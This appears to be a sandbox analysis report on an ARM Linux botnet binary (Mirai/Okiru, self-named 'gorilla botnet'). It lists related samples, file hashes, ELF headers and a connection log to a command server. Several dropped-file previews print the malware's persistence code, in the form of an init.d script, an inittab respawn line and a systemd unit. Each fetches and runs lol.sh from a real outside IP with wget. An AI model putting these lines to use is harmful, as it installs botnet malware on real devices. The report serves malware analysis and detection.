                                                    nabarm6.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    zerppc.elfGet hashmaliciousUnknownBrowse
                                                    • 185.125.190.26
                                                    zerarm5.elfGet hashmaliciousUnknownBrowse
                                                    • 185.125.190.26
                                                    zermips.elfGet hashmaliciousUnknownBrowse
                                                    • 185.125.190.26
                                                    zerm68k.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    zerarm6.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    CANONICAL-ASGBx86_32.nn.elfGet hashmaliciousOkiruBrowse
                                                    • 185.125.190.26
                                                    mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                    • 91.189.91.42
                                                    nklarm6.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    splarm6.elfGet hashmaliciousUnknownBrowse
                                                    • 185.125.190.26
                                                    nabarm6.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    zerppc.elfGet hashmaliciousUnknownBrowse
                                                    • 185.125.190.26
                                                    zerarm5.elfGet hashmaliciousUnknownBrowse
                                                    • 185.125.190.26
                                                    zermips.elfGet hashmaliciousUnknownBrowse
                                                    • 185.125.190.26
                                                    zerm68k.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    zerarm6.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    INIT7CHmipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                    • 109.202.202.202
                                                    nklarm6.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    nabarm6.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    zerm68k.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    zerarm6.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    armv4eb.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                                    • 109.202.202.202
                                                    tftp.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    arm5.nn-20241224-0050.elfGet hashmaliciousOkiruBrowse
                                                    • 109.202.202.202
                                                    bot.sh4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                    • 109.202.202.202
                                                    NETIXBGx86_32.nn.elfGet hashmaliciousOkiruBrowse
                                                    • 94.156.227.234
                                                    mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                    • 94.156.227.234
                                                    arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 94.156.227.234
                                                    powerpc.nn.elfGet hashmaliciousOkiruBrowse
                                                    • 94.156.227.234
                                                    x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                                    • 94.156.227.234
                                                    arm7.nn-20241224-0051.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 94.156.227.234
                                                    sparc.nn.elfGet hashmaliciousOkiruBrowse
                                                    • 94.156.227.234
                                                    arm5.nn-20241224-0050.elfGet hashmaliciousOkiruBrowse
                                                    • 94.156.227.234
                                                    arm.nn-20241224-0050.elfGet hashmaliciousOkiruBrowse
                                                    • 94.156.227.234
                                                    mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                    • 94.156.227.234
                                                    No context
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    /etc/init.d/systemarm.nn.elfGet hashmaliciousOkiruBrowse
                                                      arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                        arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                          arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                              /etc/init.d/arm.nn.elfarm.nn.elfGet hashmaliciousOkiruBrowse
                                                                arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                        Process:/tmp/arm.nn.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):119
                                                                        Entropy (8bit):4.679703018985171
                                                                        Encrypted:false
                                                                        SSDEEP:3:KPJRX7/LsDFDDoCvLdjX48FIbILbaaFOdFXa5O:WJRsZfoYZX48bbaaeXCO
                                                                        MD5:22B40D94325900AFDC6B9EB53D194798
                                                                        SHA1:08BE0BA4A0DBBAF03672860E49CAA446FA5A0D01
                                                                        SHA-256:B7000D755BB22142ACD09A694C2DFD398200F3428CEE07D4C9F8C794645D75DA
                                                                        SHA-512:D69CFF1875DAB0EA05BCB8A36098EC617C369D738BC0E0BF2F9220394E34D90B2B3A534AFC7F34E0DDFB56041B1BF3FC4247BA7B412D397598BB50578DDC5151
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:run bootcmd_mmc0; /tmp/arm.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                                        Process:/bin/sh
                                                                        File Type:POSIX shell script, ASCII text executable
                                                                        Category:dropped
                                                                        Size (bytes):395
                                                                        Entropy (8bit):4.5256951458576244
                                                                        Encrypted:false
                                                                        SSDEEP:12:QRkuXXNxntPUJgjvMX22FMuKN+dRRucSOyd3:qNcIyX3YOM3
                                                                        MD5:91C4AC999529755823334A4B6DCD82A8
                                                                        SHA1:2A19501075932DA23C70BD6BA43A153A277C106F
                                                                        SHA-256:539CB4475ACE236662094B848B12C2AAC9325C89A5DB6742AFFE492E710BAB63
                                                                        SHA-512:CBA55E615DE4A51F6BA23BC9946B2D9A3B145EE40D1C61D60B901D43ABBCBA421C3DB52A61D9FF090C836C8EBFDA9DB2BE711BE36E12BCFF5A4B7EA37646B8C1
                                                                        Malicious:true
                                                                        Joe Sandbox View:
                                                                        • Filename: arm.nn.elf, Detection: malicious, Browse
                                                                        • Filename: arm.nn.elf, Detection: malicious, Browse
                                                                        • Filename: arm.nn.elf, Detection: malicious, Browse
                                                                        • Filename: arm.nn.elf, Detection: malicious, Browse
                                                                        • Filename: arm.nn.elf, Detection: malicious, Browse
                                                                        Reputation:low
                                                                        Preview:#!/bin/sh.# /etc/init.d/arm.nn.elf..case "" in. start). echo 'Starting arm.nn.elf'. /tmp/arm.nn.elf &. wget http://94.156.227.233/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping arm.nn.elf'. killall arm.nn.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start|stop|restart}". exit 1. ;;.esac.exit 0.
                                                                        Process:/tmp/arm.nn.elf
                                                                        File Type:POSIX shell script, ASCII text executable
                                                                        Category:dropped
                                                                        Size (bytes):106
                                                                        Entropy (8bit):4.682554646441517
                                                                        Encrypted:false
                                                                        SSDEEP:3:TKH4vZK7/LsDFDvSDRFiLdjX48FIbILpaKB0dFLoKE0:h8sZzSXoZX48bzBeLXE0
                                                                        MD5:F8346921DDA8570FAF18A4B049A6F54B
                                                                        SHA1:F360ACA003B97FC60A7010DEF8F2F8D6F2C8499E
                                                                        SHA-256:2812F2399C64C10D897C3C95CC6690503E188BE3D8410D889944394E0BBCDDDF
                                                                        SHA-512:C6073A0298CDF62D6B2159B41A90E2D7258ABD6B017E37CB93306E63B6A9362AE6353291658605D9AA07552FD89F70BD34083A4A58C32B16906220818FE078E8
                                                                        Malicious:true
                                                                        Joe Sandbox View:
                                                                        • Filename: arm.nn.elf, Detection: malicious, Browse
                                                                        • Filename: arm.nn.elf, Detection: malicious, Browse
                                                                        • Filename: arm.nn.elf, Detection: malicious, Browse
                                                                        • Filename: arm.nn.elf, Detection: malicious, Browse
                                                                        • Filename: arm.nn.elf, Detection: malicious, Browse
                                                                        Reputation:low
                                                                        Preview:#!/bin/sh./tmp/arm.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.
                                                                        Process:/tmp/arm.nn.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):111
                                                                        Entropy (8bit):4.59789251037952
                                                                        Encrypted:false
                                                                        SSDEEP:3:nAWu5d/LsDFDDoCvLdjX48FIbILbaaFOdFXa5O:AUZfoYZX48bbaaeXCO
                                                                        MD5:55ADC91BBFC3DEAAD541897F8FA8C3AA
                                                                        SHA1:9C13D4048F5E07583DBAC8E2E8351906C030490C
                                                                        SHA-256:BCED71633ACE84C49EAC303BFB7C3F09435E55E79A1E154BDCB6E3148AF4AFAB
                                                                        SHA-512:04807E43BF00C5E8BF5009FC74F763E2E4AA2DDE54BAE4687667DBC39D63B03C3ECCE6866365A5A42268B3A86E44F20497A5675EAAF65AC3B6137E6180B6E0D7
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:::respawn:/tmp/arm.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                                        Process:/tmp/arm.nn.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):53
                                                                        Entropy (8bit):3.871459242626451
                                                                        Encrypted:false
                                                                        SSDEEP:3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
                                                                        MD5:2BD9B4BE30579E633FC0191AA93DF486
                                                                        SHA1:7D63A9BD9662E86666B27C1B50DB8E7370C624FF
                                                                        SHA-256:64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
                                                                        SHA-512:AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
                                                                        Malicious:false
                                                                        Preview:gorilla botnet is on the device ur not a cat go away.
                                                                        Process:/tmp/arm.nn.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):102
                                                                        Entropy (8bit):4.523807003925601
                                                                        Encrypted:false
                                                                        SSDEEP:3:Tg7/LsDFDvSDRFiLdjX48FIbILbaaFOdFXa50:TgsZzSXoZX48bbaaeXC0
                                                                        MD5:C4A190F91F287CB5371DA6C74E0DB1B1
                                                                        SHA1:88A0A8B84986C3669F1ACCDCD826E50EA179699F
                                                                        SHA-256:E12E43C2746D0AC57EF00BBC885AD0B8F6D1EE57DE9419E33A2910D90C2B1F68
                                                                        SHA-512:263F001AD19AFB93CF9337BF8A436F03C4A7EC6834CAC19B196DE794D59C61309DD4EBD66AAC0FE2715A16916483AD41AABA8A3414E10CE6DEE95D7DF0308820
                                                                        Malicious:true
                                                                        Preview:/tmp/arm.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.
                                                                        Process:/tmp/arm.nn.elf
                                                                        File Type:POSIX shell script, ASCII text executable
                                                                        Category:dropped
                                                                        Size (bytes):10
                                                                        Entropy (8bit):3.121928094887362
                                                                        Encrypted:false
                                                                        SSDEEP:3:TKH4vn:hv
                                                                        MD5:3E2B31C72181B87149FF995E7202C0E3
                                                                        SHA1:BD971BEC88149956458A10FC9C5ECB3EB99DD452
                                                                        SHA-256:A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
                                                                        SHA-512:543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:#!/bin/sh.
                                                                        Process:/tmp/arm.nn.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):300
                                                                        Entropy (8bit):5.05186756643222
                                                                        Encrypted:false
                                                                        SSDEEP:6:z8ifitRZAMzdK+Yz02+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+gp+GWRdtd+GWRXY+GWRuL6
                                                                        MD5:1436FD8C3CCFF505882485A3B599A9C6
                                                                        SHA1:6F528C6FE83928E73DF405594874CD8483BACE98
                                                                        SHA-256:79FF775817DFEF4AC56DEAC28E322E0123A89498C11C6836A478925E61F6F145
                                                                        SHA-512:07590419B290AE785D9894357A07B724B963B6E05ACFEB7C1AA2F78E80D04D5284B42D455D112F642316F9560812F5730F96A1A770AD81EC4DA35CD0898F665F
                                                                        Malicious:false
                                                                        Preview:[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/arm.nn.elf.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://94.156.227.233/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.
                                                                        Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):76
                                                                        Entropy (8bit):3.7627880354948586
                                                                        Encrypted:false
                                                                        SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                        MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                        SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                        SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                        SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                        Malicious:false
                                                                        Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                                        Process:/tmp/arm.nn.elf
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):16
                                                                        Entropy (8bit):3.5
                                                                        Encrypted:false
                                                                        SSDEEP:3:Tg7/LsDln:Tgs5n
                                                                        MD5:5A9E68CC61A24B23E7CE850CBE55CD38
                                                                        SHA1:7D53E57B760618566E5B635118604478EE1175B1
                                                                        SHA-256:300279D18C7FC46D9F271DFDD3D803874D1B222B3512385D9FFFEED712EF1D97
                                                                        SHA-512:09970D3B321DA48BAEB46B368CF5C40CCB90A0EB76300D7F5B03441FE9161AA5FD26C152CE83DC681397FD2FA81B6AD824092660285B1562F4D326C60517C7F3
                                                                        Malicious:false
                                                                        Preview:/tmp/arm.nn.elf.
                                                                        File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                                                                        Entropy (8bit):6.179174718073473
                                                                        TrID:
                                                                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                        File name:arm.nn.elf
                                                                        File size:91'808 bytes
                                                                        MD5:e2f7e7155399c4035b2c1c805c721610
                                                                        SHA1:d2e386a8c5f65ca9f1aec178298c545a25d58c7d
                                                                        SHA256:b223160a9b5e58400e86e34c50d2d36d1d874eabdc272641a8d66eed75245493
                                                                        SHA512:bc3aa24822b1520588f7376463664efa69fce82ded275fd1606e36e08ae034ba8ae7ee3deb391c6bf9f107095f524a8841d4eb1a1b0d87688c81e331684a5010
                                                                        SSDEEP:1536:sZPtGOlFvtMhh3POBnL4pv6YjnXQLkHdsyYA2k40v85To:sZPtGOl2Ps4pjrIkHdsDSoTo
                                                                        TLSH:DA932A51B8819623C6D523BBF67E02CD3B2613B8D2EF7216CD25AF21738692B0D77641
                                                                        File Content Preview:.ELF...a..........(.........4....e......4. ...(......................^...^...............`...`...`.......&..........Q.td..................................-...L."...1N..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                                                        ELF header

                                                                        Class:ELF32
                                                                        Data:2's complement, little endian
                                                                        Version:1 (current)
                                                                        Machine:ARM
                                                                        Version Number:0x1
                                                                        Type:EXEC (Executable file)
                                                                        OS/ABI:ARM - ABI
                                                                        ABI Version:0
                                                                        Entry Point Address:0x8190
                                                                        Flags:0x202
                                                                        ELF Header Size:52
                                                                        Program Header Offset:52
                                                                        Program Header Size:32
                                                                        Number of Program Headers:3
                                                                        Section Header Offset:91408
                                                                        Section Header Size:40
                                                                        Number of Section Headers:10
                                                                        Header String Table Index:9
                                                                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                        NULL0x00x00x00x00x0000
                                                                        .initPROGBITS0x80940x940x180x00x6AX004
                                                                        .textPROGBITS0x80b00xb00x138fc0x00x6AX0016
                                                                        .finiPROGBITS0x1b9ac0x139ac0x140x00x6AX004
                                                                        .rodataPROGBITS0x1b9c00x139c00x252c0x00x2A004
                                                                        .ctorsPROGBITS0x260000x160000x80x00x3WA004
                                                                        .dtorsPROGBITS0x260080x160080x80x00x3WA004
                                                                        .dataPROGBITS0x260140x160140x4bc0x00x3WA004
                                                                        .bssNOBITS0x264d00x164d00x22140x00x3WA004
                                                                        .shstrtabSTRTAB0x00x164d00x3e0x00x0001
                                                                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                        LOAD0x00x80000x80000x15eec0x15eec6.20200x5R E0x8000.init .text .fini .rodata
                                                                        LOAD0x160000x260000x260000x4d00x26e44.63440x6RW 0x8000.ctors .dtors .data .bss
                                                                        GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 24, 2024 05:32:56.262065887 CET43928443192.168.2.2391.189.91.42
                                                                        Dec 24, 2024 05:32:58.024949074 CET6000838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:32:58.144735098 CET382426000894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:32:58.144820929 CET6000838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:32:58.145287037 CET6000838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:32:58.264775991 CET382426000894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:32:58.668808937 CET6000838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:32:58.831396103 CET382426000894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:32:59.268881083 CET382426000894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:32:59.268989086 CET6000838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:32:59.674797058 CET6001038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:32:59.794428110 CET382426001094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:32:59.794524908 CET6001038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:32:59.794526100 CET6001038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:32:59.914123058 CET382426001094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:00.310403109 CET6001038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:00.475285053 CET382426001094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:00.923623085 CET382426001094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:00.923710108 CET6001038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:01.361974001 CET6001238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:01.481586933 CET382426001294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:01.481663942 CET6001238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:01.481708050 CET6001238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:01.603348970 CET382426001294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:01.637233019 CET42836443192.168.2.2391.189.91.43
                                                                        Dec 24, 2024 05:33:01.989860058 CET6001238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:02.151297092 CET382426001294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:02.405107975 CET4251680192.168.2.23109.202.202.202
                                                                        Dec 24, 2024 05:33:02.609014988 CET382426001294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:02.609105110 CET6001238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:02.991880894 CET6001438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:03.111635923 CET382426001494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:03.111728907 CET6001438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:03.111728907 CET6001438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:03.231426001 CET382426001494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:03.616533041 CET6001438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:03.782820940 CET382426001494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:04.233490944 CET382426001494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:04.233561993 CET6001438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:04.617650986 CET6001638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:04.737382889 CET382426001694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:04.737442970 CET6001638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:04.737458944 CET6001638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:04.857039928 CET382426001694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:05.245486975 CET6001638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:05.411360025 CET382426001694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:05.874979019 CET382426001694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:05.875042915 CET6001638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:06.246468067 CET6001838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:06.366211891 CET382426001894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:06.366285086 CET6001838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:06.366303921 CET6001838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:06.485941887 CET382426001894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:06.869905949 CET6001838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:07.031405926 CET382426001894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:07.478184938 CET382426001894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:07.478302002 CET6001838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:07.870807886 CET6002038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:07.990417004 CET382426002094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:07.990487099 CET6002038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:07.990525007 CET6002038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:08.110213995 CET382426002094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:08.493901968 CET6002038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:08.655307055 CET382426002094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:09.120173931 CET382426002094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:09.120246887 CET6002038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:09.494731903 CET6002238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:09.614319086 CET382426002294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:09.614413977 CET6002238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:09.614470959 CET6002238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:09.734317064 CET382426002294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:10.117650032 CET6002238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:10.279266119 CET382426002294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:10.732800007 CET382426002294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:10.732894897 CET6002238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:11.118443012 CET6002438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:11.238250017 CET382426002494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:11.238347054 CET6002438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:11.238509893 CET6002438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:11.358009100 CET382426002494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:11.743594885 CET6002438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:11.903338909 CET382426002494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:12.379767895 CET382426002494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:12.379862070 CET6002438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:12.744674921 CET6002638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:12.864603043 CET382426002694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:12.864859104 CET6002638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:12.864927053 CET6002638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:12.984493971 CET382426002694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:13.372106075 CET6002638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:13.535372019 CET382426002694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:14.003473043 CET382426002694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:14.003659964 CET6002638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:14.373099089 CET6002838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:14.492713928 CET382426002894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:14.492793083 CET6002838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:14.492875099 CET6002838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:14.612449884 CET382426002894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:14.997812986 CET6002838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:15.160331011 CET382426002894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:15.615098953 CET382426002894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:15.615396023 CET6002838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:15.999042988 CET6003038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:16.119045019 CET382426003094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:16.119143009 CET6003038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:16.119219065 CET6003038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:16.238771915 CET382426003094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:16.483141899 CET43928443192.168.2.2391.189.91.42
                                                                        Dec 24, 2024 05:33:16.625571966 CET6003038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:16.787275076 CET382426003094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:17.239116907 CET382426003094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:17.239212036 CET6003038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:17.626315117 CET6003238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:17.745927095 CET382426003294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:17.746058941 CET6003238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:17.746090889 CET6003238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:17.865722895 CET382426003294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:18.249330044 CET6003238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:18.415375948 CET382426003294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:18.865744114 CET382426003294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:18.865833998 CET6003238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:19.250159025 CET6003438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:19.369883060 CET382426003494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:19.369967937 CET6003438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:19.369982958 CET6003438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:19.489599943 CET382426003494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:19.873492956 CET6003438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:20.035304070 CET382426003494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:20.490454912 CET382426003494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:20.490695000 CET6003438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:20.874279022 CET6003638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:20.994237900 CET382426003694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:20.994544983 CET6003638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:20.994544983 CET6003638242192.168.2.2394.156.227.234
